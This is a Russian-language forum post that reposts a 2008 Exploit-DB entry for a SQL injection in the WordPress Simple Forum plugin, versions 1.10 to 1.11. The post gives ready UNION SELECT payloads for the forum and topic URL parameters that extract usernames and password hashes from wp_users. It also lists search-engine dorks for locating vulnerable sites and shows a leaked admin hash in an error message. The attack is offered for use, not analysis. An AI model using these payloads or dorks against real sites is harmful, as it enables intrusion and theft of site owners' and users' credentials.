Exploit WordPress Plugin Simple Forum 1.10 < 1.11 - SQL Injection

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5127
Проверка EDB
  1. Пройдено
Автор
S@BUN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2008-02-15
Код: 
###############################################################
#
# Simple Forum Version 1.10-1.11 SQL Injection
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAÄ°L : [email protected]
#
################################################################
Simple Forum - Version 1.10
Simple Forum - Version 1.10 - ( 2.1.3)
Simple Forum - Version 1.11

################################################################

EXPLAÄ°N=

sametimes password and username in error massege for axample you can see in

(bazen şifreler hataların içindedir)

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '|admin|b8329b6e20b9f84f7b44ee678a5f484d| WHERE topic_id=-1/**/UNION/**/SELECT/**' at line 1]
UPDATE wp_sftopics SET topic_opened = |admin|b8329b6e20b9f84f7b44ee678a5f484d| WHERE topic_id=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

################################################################

 DORK 1 :

Simple Forum - Version 1.10
Simple Forum - Version 1.10 - ( 2.1.3)
Simple Forum - Version 1.11

 DORK 2 : allinurl: topic "forums?forum="

################################################################
  example

http://xxxxx/forums?forum=xxxx&topic= (expliot)

  EXPLOÄ°T 1 :

-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

  EXPLOÄ°T 2 :

SÄ°METÄ°MES YOU CANT SEE (xxxx&topic) SOO USE THÄ°S EXPLOÄ°T AFTER forum=xxx(number)

  example

www.xxxxx/forums?forum=1(expliot)

&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*


################################################################
# S@BUN                   i AM NOT HACKER                S@BUN
################################################################

# milw0rm.com [2008-02-15]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)
Ответы
0
Просмотры
991
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin Simple Add Pages or Posts 1.6 - Cross-Site Request Forgery
Ответы
0
Просмотры
600
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin Simple Gmail Login - Stack Trace Information Disclosure
Ответы
0
Просмотры
568
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin Really Simple Guest Post 1.0.6 - Local File Inclusion
Ответы
0
Просмотры
506
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection
Ответы
0
Просмотры
509
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin Simple Ads Manager - Multiple SQL Injections
Ответы
0
Просмотры
462
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin Simple Download Button ShortCode 1.0 - Remote File Disclosure
Ответы
0
Просмотры
481
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin Eventify - Simple Events 1.7.f SQL Injection
Ответы
0
Просмотры
438
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin Simple Forum 2.0 < 2.1 - SQL Injection
Ответы
0
Просмотры
367
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin AN_Gradebook 5.0.1 - SQLi
Ответы
0
Просмотры
620
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу